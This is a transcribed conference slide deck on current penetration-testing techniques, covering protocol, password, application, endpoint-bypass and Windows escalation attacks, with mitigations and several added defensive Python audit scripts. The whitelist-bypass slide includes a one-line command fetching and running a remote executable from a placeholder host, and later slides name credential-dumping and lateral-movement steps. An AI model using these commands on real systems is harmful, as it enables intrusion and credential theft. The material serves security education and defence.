ATTACK ALL THE LAYERS - AGAIN!: WHAT'S WORKING DURING PENTESTS. SCOTT SUTHERLAND AND KARL FOSAAEN. MAY 14, 1:30 PM

Secure360 - Attack All the Layers! Again!


DESCRIPTION

This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. The talk includes real-world examples of attacks that the authors use on a daily basis, and some reflections on which techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers are all covered, along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real-world attacks. More security blogs by the authors can be found at https://www.netspi.com/blog/


Page 1: Secure360 - Attack All the Layers! Again!

ATTACK ALL THE LAYERS - AGAIN!: WHAT'S WORKING DURING PENTESTS

SCOTT SUTHERLAND AND KARL FOSAAEN

MAY 14, 1:30 PM

Page 2: Secure360 - Attack All the Layers! Again!

INTRODUCTIONS

Scott Sutherland Principal Security Consultant @ NetSPI Twitter: @_nullbind

Karl Fosaaen Senior Security Consultant @ NetSPI Twitter: @kfosaaen

We specialize in both things and stuff!

Page 3: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Why do companies pen test?

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

• Conclusions

Page 4: Secure360 - Attack All the Layers! Again!

WHY DO COMPANIES PEN TEST?

• Compliance requirements

• Evaluate risks associated with an acquisition or partnership

• Validate preventative controls

• Validate detective controls

• Prioritize internal security initiatives

• Proactively prevent breaches

Page 5: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Page 6: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS

• ARP: Address Resolution Protocol

• NBNS: NetBIOS Name Service

• SMB: Server Message Block

• PXE: Preboot Execution Environment

• DTP: Dynamic Trunking Protocol

Page 7: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: ARP

Address Resolution Protocol

Page 8: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: ARP

• General

- MAC to IP association

- Layer 2

• Conditions

- Independent of user action

- Broadcast network

• Attacks

- MITM Monitoring

- MITM Injection

- DOS

Page 9: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: ARP

Page 10: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: ARP

Common mitigating controls:

• Dynamic ARP Inspection

• Port Security

• Static Routes (not recommended)
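The ARP slides describe MITM monitoring and injection on a broadcast segment and list Dynamic ARP Inspection and port security as the switch-side controls. On segments where those are not available, the detective counterpart is a passive ARP monitor in the style of arpwatch: record which MAC claims each IP and alert when the claim changes. The following is an added example written for this page, not code from the talk or from NetSPI; the ARP reply records are constructed and stand in for what a sniffer would capture.

```python
"""Detect ARP cache poisoning symptoms from a stream of ARP replies.

Added example, not from the talk. Input is a list of
(timestamp_seconds, sender_ip, sender_mac) tuples as a passive sniffer
or arpwatch-style tool would record them from ARP replies on a segment.
"""
from collections import defaultdict

# Constructed sample: 10.0.0.1 is the gateway. At t=30 a second MAC starts
# claiming the gateway IP and the real gateway answers again at t=32, the
# flip-flop typical of a poisoning attempt. 10.0.0.20 is unremarkable.
SAMPLE_ARP_REPLIES = [
    (0,  "10.0.0.1",  "00:11:22:33:44:55"),
    (5,  "10.0.0.20", "aa:bb:cc:dd:ee:01"),
    (30, "10.0.0.1",  "de:ad:be:ef:00:01"),
    (31, "10.0.0.1",  "de:ad:be:ef:00:01"),
    (32, "10.0.0.1",  "00:11:22:33:44:55"),
    (60, "10.0.0.20", "aa:bb:cc:dd:ee:01"),
]


def detect_arp_conflicts(replies, window=300):
    """Return alerts for IPs claimed by more than one MAC within `window` seconds.

    Each alert is (ip, previous_mac, new_mac, timestamp). A legitimate NIC
    replacement also triggers one alert, so alerts need analyst review;
    repeated changes for the same IP are the stronger signal.
    """
    last_seen = {}  # ip -> (mac, timestamp of most recent reply)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in last_seen:
            prev_mac, prev_ts = last_seen[ip]
            if prev_mac != mac and ts - prev_ts <= window:
                alerts.append((ip, prev_mac, mac, ts))
        last_seen[ip] = (mac, ts)
    return alerts


def flip_flop_ips(alerts):
    """IPs whose MAC changed more than once: likely poisoning rather than a NIC swap."""
    counts = defaultdict(int)
    for ip, *_ in alerts:
        counts[ip] += 1
    return sorted(ip for ip, n in counts.items() if n > 1)


if __name__ == "__main__":
    found = detect_arp_conflicts(SAMPLE_ARP_REPLIES)
    for ip, old, new, ts in found:
        print(f"t={ts}: {ip} moved from {old} to {new}")
    print("flip-flop IPs:", flip_flop_ips(found))
```

The window keeps a stale entry from months ago from raising an alert when a host is legitimately re-addressed; tune it to the segment's DHCP lease time.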

Page 11: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS / LLMNR

NetBIOS Name Service

Page 12: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS

• General

- IP to hostname association

- Layer 5 / 7

• Constraints

- Dependent on user action

- Broadcast network

- Windows only

• Attacks

- MITM Monitoring

- MITM Injection

- DOS

Page 13: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS

Page 14: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS

Page 15: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS

Page 16: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: NBNS

Common mitigating controls:

• Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS

• Disable NBNS

• Disable insecure authentication methods to help limit the impact of exposed hashes

• Enable packet signing to help prevent SMB Relay attacks

Page 17: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: SMB

Server Message Block

Page 18: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: SMB

• General

- SMB is the comeback kid!

- Layer 7

• Constraints

- Dependent on user action

- Any routable network

- No connecting back to the originating host

• Attacks

- Command execution

- Shells... aaand shells

Page 19: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: SMB

Page 20: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: SMB

Historically SMB Relay has been used to:

• Execute arbitrary commands

• Obtain shells

Lately the community has been developing tools for doing things like:

• LDAP queries

• SQL queries

• Exchange services

• Mounting file systems

Page 21: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: SMB

Common mitigating controls:

• Enable packet signing to help prevent SMB Relay attacks

• Apply really old patches like if you missed out on the last decade…

Page 22: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: PXE

Preboot eXecution Environment

Page 23: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: PXE

• General

- DHCP

• Attacks

- Rogue PXE server

- Command execution

- Access to unencrypted drive images

- Shells... aaand shells

Page 24: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: PXE

Common mitigating controls:

• MAC/IP filters

• Limit PXE to specific networks

• Network Access Controls - NAC

Page 25: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Dynamic Trunking Protocol

Page 26: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Common mitigating controls:

• Use a dedicated VLAN ID for all trunking ports

• Disable all unused ports and place them on a non-routable VLAN

• Configure all user ports as access ports to prevent trunk negotiation

• Configure frames with two 802.1Q headers

• Configure strong VACLs

Page 27: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

• General

- 802.1Q encapsulation is in use

- Layer 2

• Constraints

- Independent of user action

- Trunking is set to enabled or auto on the switch port

• Attacks

- Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default

- *Full VLAN hopping

Page 28: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Page 29: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Page 30: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Page 31: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Page 32: Secure360 - Attack All the Layers! Again!

ATTACKING PROTOCOLS: DTP

Common mitigating controls:

• Use a dedicated VLAN ID for all trunking ports

• Disable all unused ports and place them on a non-routable VLAN

• Configure all user ports as access ports to prevent trunk negotiation

• Configure frames with two 802.1Q headers

• Configure strong VACLs

Page 33: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Page 34: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS

• Hashes and Cracking (Offline)

• Dictionary Attacks (Online)

• Dump in Cleartext!

Page 35: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS

Tool              Function                  Year
----------------  ------------------------  -----
Pass the Hash     Passing Hashes            1997
Rainbow Tables    Password Cracking         2000s
SMB Relay         Relaying Captured Hashes  2001
John the Ripper   Password Cracking         2001
NetNTLM.pl        Cracking Network Hashes   2007
PTH Toolkit       Pass all the Hashes       2008
Hashcat           CPU and GPU Cracking      2010
WCE and Mimikatz  Cleartext Windows Creds   2012

Page 36: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: DICTIONARY

• Online vs. Offline Attacks

• Dictionary Attacks

- Enumerate users: null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc.

- Attack!

• Are users getting smarter?

- Sort of… “Spring2014” meets password complexity requirements
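The point of the “Spring2014” line is that a complexity policy (length plus character classes) says nothing about guessability: season-plus-year is one of the first things an online dictionary attack tries. The code below is an added example for this page, not from the talk or from NetSPI. It puts a typical complexity rule next to the kind of pattern filter a password filter DLL or self-service reset page can apply on top; the word lists and the organisation name are constructed placeholders.

```python
"""Why “Spring2014” satisfies a complexity policy yet falls to a dictionary attack.

Added example, not from the talk. A Windows-style complexity rule
(minimum length, three of four character classes) is checked next to a
pattern filter that rejects season/common-word/organisation stems with a
trailing year or digits. Word lists below are constructed for the demo.
"""
import re

SEASONS = ("spring", "summer", "fall", "autumn", "winter")
COMMON_WORDS = ("password", "welcome", "letmein", "changeme")  # constructed sample list
ORG_WORDS = ("acme",)  # placeholder for the organisation's own name and products

# Leetspeak substitutions undone before matching, so "Spr1ng" matches "spring".
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})


def meets_complexity(pw, min_len=8):
    """Baseline policy: length >= min_len and at least three of four classes."""
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    present = sum(1 for pattern in classes if re.search(pattern, pw))
    return len(pw) >= min_len and present >= 3


def weak_pattern(pw):
    """Return why a password is guessable, or None if no pattern rule fires.

    The stem is the password minus any trailing digits/symbols (the "2014"
    or "2014!" users append to satisfy the policy), with leetspeak undone.
    Season, common-word and organisation stems are what a dictionary
    attack tries first, so they are rejected regardless of complexity.
    """
    low = pw.lower()
    trimmed = re.sub(r"[^a-z]+$", "", low)   # strip trailing digits/symbols
    stem = trimmed.translate(LEET)
    if trimmed == low:
        suffix = ""
    elif re.search(r"(19|20)\d{2}", low):
        suffix = " + year"
    else:
        suffix = " + digits/symbols"
    if stem in SEASONS:
        return "season" + suffix
    if stem in COMMON_WORDS:
        return "common word" + suffix
    if stem in ORG_WORDS:
        return "organisation name" + suffix
    return None


def evaluate(pw):
    """Combine both checks; a password is acceptable only when both pass."""
    reason = weak_pattern(pw)
    return {"complexity": meets_complexity(pw), "weak_pattern": reason,
            "accept": meets_complexity(pw) and reason is None}


if __name__ == "__main__":
    for candidate in ("Spring2014", "Spr1ng2014!", "P@ssw0rd1", "Acme2014",
                      "correct horse battery staple 42"):
        print(candidate, evaluate(candidate))
```

“Spring2014” passes the complexity check (lower, upper, digits, ten characters) and is rejected only by the pattern filter; a long passphrase with no dictionary stem passes both.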

Page 37: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: HASHES

• What are hashes?

- A non-reversible way of storing passwords

- Operating systems and applications

- Lots of types: LM/NTLM (network and local), MD5, SHA, descrypt

Page 38: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: HASHES

• How do we get hashes?

- Cain and Abel

- fgdump

- Metasploit

- Mimikatz

- Databases

- Config files

Page 39: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: CRACKING

• Cracking Hashes

- Rainbow Tables

- John the Ripper

- oclHashcat

- CPU versus GPU

Page 40: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: CRACKING

[Chart: Minutes for Six Character Brute Force, CPU vs. GPU (y-axis: minutes, 0 to 600). CPU: 9 hours; GPU: 24 seconds]

Page 41: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: CRACKING

[Chart: GPU vs. CPU]

Page 42: Secure360 - Attack All the Layers! Again!

ATTACKING PASSWORDS: CLEARTEXT

• Common application configs

• Reversible formats

• Find in files

- Groups.xml

- Unattend.xml

- Sysprep

• Registry

• WCE

• Mimikatz
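Groups.xml appears on the slide under “reversible formats” because Group Policy Preferences stored account passwords in SYSVOL XML files as a cpassword attribute encrypted with a key Microsoft published, so any domain user who can read SYSVOL can recover them. The defender's job is to find and remove every remaining entry. The scanner below is an added example for this page, not from the talk or from NetSPI; it reports where cpassword attributes live without decrypting anything, and the SYSVOL tree it scans is constructed in a temporary directory for the demo.

```python
"""Find Group Policy Preference XML files that still carry a cpassword attribute.

Added example, not from the talk. Walks a SYSVOL-like tree (a real audit
would point it at \\\\<domain>\\SYSVOL\\<domain>\\Policies) and reports each
element with a non-empty cpassword. Nothing is decrypted; the output is
a remediation list. Sample files are constructed below.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP file names that can carry cpassword.
CPASSWORD_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
                   "DataSources.xml", "Printers.xml", "Drives.xml")

# Constructed sample shaped like a GPP local-user entry. The cpassword
# value is a placeholder string, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_BASE64_CPASSWORD"
                changeLogon="0" noChange="1" neverExpires="1"
                acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
"""

# Constructed clean sample: group membership only, no stored password.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)" cpassword=""/>
  </Group>
</Groups>
"""


def find_cpassword(root_dir):
    """Return (relative path, account name, cpassword length) for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in CPASSWORD_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed file; a production audit would log it
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if not cpw:          # absent or empty: no stored password
                    continue
                # Groups.xml names the account on the same Properties element;
                # Services/ScheduledTasks use accountName or runAs.
                account = (elem.get("userName") or elem.get("accountName")
                           or elem.get("runAs") or "?")
                hits.append((os.path.relpath(path, root_dir), account, len(cpw)))
    return hits


def build_sample_sysvol():
    """Create a constructed SYSVOL-like tree with one affected and one clean GPO."""
    base = tempfile.mkdtemp(prefix="sysvol_demo_")
    for gpo, content in (("{GPO-1}", SAMPLE_GROUPS_XML), ("{GPO-2}", SAMPLE_CLEAN_XML)):
        d = os.path.join(base, "Policies", gpo, "Machine", "Preferences", "Groups")
        os.makedirs(d)
        with open(os.path.join(d, "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(content)
    return base


if __name__ == "__main__":
    for rel, account, length in find_cpassword(build_sample_sysvol()):
        print(f"{rel}: account={account} cpassword_len={length}")
```

An empty cpassword attribute (the clean sample) is not a finding; only a populated one means a credential is sitting in SYSVOL.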

Page 43: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Page 44: Secure360 - Attack All the Layers! Again!

ATTACKING APPLICATIONS: COMMON

• Default and weak passwords

• SQL injection

• RFI/web shells

• Web directory traversals

• UNC path injection + SMB relay

• Critical missing patches

Page 45: Secure360 - Attack All the Layers! Again!

ATTACKING APPLICATIONS: BREAKOUTS

• Obtain a common dialog box

• Bypass folder path and file type restrictions

• Bypass file execution restrictions

• Bypass file black/white lists

• Access to native consoles and management tools

• Download and use third party applications

Page 46: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Page 47: Secure360 - Attack All the Layers! Again!

BYPASSING EPP: ANTI-VIRUS

• Powershell Code Injection

• Execute off network share

• Clone resource tables

• Modify import tables

• Pack files

Page 48: Secure360 - Attack All the Layers! Again!

BYPASSING EPP: APP WHITE LIST

• Rename executables

• Execution via approved apps

- Powershell Code Injection

- Rundll32 mydll,DLLMain@12

- IEExec http://x.x.x.x:8080/bypass.exe

- cmd /c file.exe

• Directory Exceptions

• Disable Services

• Poisoning updates and approved file lists

Page 49: Secure360 - Attack All the Layers! Again!

OVERVIEW

• Attacking Protocols

• Attacking Passwords

• Attacking Applications

• Bypassing End Point Protection

• Windows Escalation

Page 50: Secure360 - Attack All the Layers! Again!

WINDOWS ESCALATION: OVERVIEW

• Privilege Escalation Goals

• Local Privilege Escalation

• Domain Privilege Escalation

Page 51: Secure360 - Attack All the Layers! Again!

WINDOWS ESCALATION: GOALS

Local Escalation Goals

- Find clear text or reversible credentials with local administrative privileges

- Get an application to run commands as Administrator or LocalSystem

Domain Escalation Goals

- Find Domain Admins

- Impersonate Domain Admins

Page 52: Secure360 - Attack All the Layers! Again!

WINDOWS ESCALATION: LOCAL

Local Escalation

• *Clear text credentials in files, registry, over network

• Insecure service paths

• DLL preloading

• DLL and exe replacement

• Binary planting in auto-run locations (registry and file system)

• Modifying scheduled tasks

• *Local and remote exploits

• Leverage local applications like IIS, SQL Server etc.

• *UNC path injection + SMB Relay / Capture + crack
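“Insecure service paths” on this slide is the classic unquoted-ImagePath problem: when a service binary path contains spaces and is not quoted, Windows tries each space-delimited prefix as an executable before reaching the real one, so a writable directory along that path lets a standard user run code as the service account (usually LocalSystem). The audit below is an added example for this page, not from the talk or from NetSPI; it evaluates ImagePath strings the way a hardening checklist would and lists the exact paths whose ACLs need reviewing. The service records are constructed; on a real host they come from `sc qc`, the Win32_Service WMI class, or the Services registry key.

```python
"""Flag Windows services whose ImagePath is open to insecure-service-path abuse.

Added example, not from the talk. Two checks are made on each service's
ImagePath string: an unquoted path containing spaces, and a binary that
lives outside the protected system/program directories (where loose
directory ACLs most often allow exe replacement). Records are constructed.
"""
import re

# Constructed sample of (service name, ImagePath, start account).
SAMPLE_SERVICES = [
    ("Spooler", r'"C:\Windows\System32\spoolsv.exe"', "LocalSystem"),
    ("VendorAgent", r"C:\Program Files\Vendor Tools\agent.exe -service", "LocalSystem"),
    ("Backup", r"C:\Tools\backup.exe", "LocalSystem"),
    ("GoodVendor", r'"C:\Program Files\Good Vendor\svc.exe" /run', r"NT AUTHORITY\LocalService"),
]

# Directories whose default ACLs do not let standard users write.
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def split_image_path(image_path):
    """Return (binary_path, quoted) from a raw ImagePath value."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end > 0 else s[1:]), True
    # Unquoted: the intended binary is everything up to the first ".exe";
    # anything after it is arguments.
    m = re.match(r"(.*?\.exe)\b", s, re.IGNORECASE)
    return (m.group(1) if m else s.split(" ")[0]), False


def hijack_candidates(binary_path):
    # For an unquoted path with spaces Windows tries each prefix first, e.g.
    # C:\Program.exe and C:\Program Files\Vendor.exe before the real agent.exe.
    # These are the locations whose write permissions a defender must verify.
    parts = binary_path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_services(services):
    """Return (name, account, [issues]) for each service with a weakness."""
    findings = []
    for name, image_path, account in services:
        binary, quoted = split_image_path(image_path)
        issues = []
        if not quoted and " " in binary:
            issues.append("unquoted path with spaces; check ACLs on "
                          + ", ".join(hijack_candidates(binary)))
        if not binary.lower().startswith(PROTECTED_PREFIXES):
            issues.append("binary outside protected directories; verify directory ACLs")
        if issues:
            findings.append((name, account, issues))
    return findings


if __name__ == "__main__":
    for name, account, issues in audit_services(SAMPLE_SERVICES):
        print(f"{name} ({account}):")
        for issue in issues:
            print("  -", issue)
```

The fix for the first finding is to quote the ImagePath (as Spooler and GoodVendor already are); the second is resolved by confirming that only administrators can write to the binary's directory.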

Page 53: Secure360 - Attack All the Layers! Again!

WINDOWS ESCALATION: DOMAIN

Domain Escalation – Find DAs

• Check locally! (Processes, Tokens, Cachedump)

• Review active sessions - netsess

• Review remote processes - tasklist

• Service Principal Names (SPN) – get-spn

• Scanning remote systems for NetBIOS information - nbtscan

• Pass the hash to other systems

• PowerShell shell spraying

• WINRM/WINRS shell spraying

• Psexec shell spraying

Page 54: Secure360 - Attack All the Layers! Again!

WINDOWS ESCALATION: DOMAIN

Domain Escalation – Impersonate DAs

• Dump passwords from memory with Mimikatz

• Migrate into the Domain Admin’s process

• Steal Domain Admins’ delegation tokens with Incognito

• Dump cached domain admin hashes with cachedump

Relatively new techniques

• PTH using Kerberos ticket

Page 55: Secure360 - Attack All the Layers! Again!
Page 56: Secure360 - Attack All the Layers! Again!

CONCLUSIONS

All can kind of be fixed

Most Networks: Kind of broken

Most Protocols: Kind of broken

Most Applications: Kind of broken

Page 57: Secure360 - Attack All the Layers! Again!

ATTACK ALL THE LAYERS!

ANY QUESTIONS?